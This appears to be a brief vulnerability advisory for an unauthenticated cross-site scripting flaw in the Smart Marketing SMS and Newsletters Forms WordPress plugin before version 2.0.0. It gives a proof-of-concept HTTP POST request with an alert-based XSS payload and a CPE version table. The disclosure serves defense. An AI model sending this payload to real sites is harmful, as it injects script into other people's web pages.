The Smart Marketing SMS and Newsletters Forms WordPress plugin was affected by an Unauthenticated Cross-Site Scripting (XSS) security vulnerability.
POST /wordpress/wp-content/plugins/smart-marketing-for-wp/admin/partials/custom/egoi-for-wp-form_egoi.php HTTP/1.1 Host: 127.0.0.1 Content-Type: application/x-www-form-urlencoded Content-Length: 32 url=" onload=“alert(‘XSS’)”>
CPE | Name | Operator | Version |
---|---|---|---|
smart-marketing-for-wp | lt | 2.0.0 |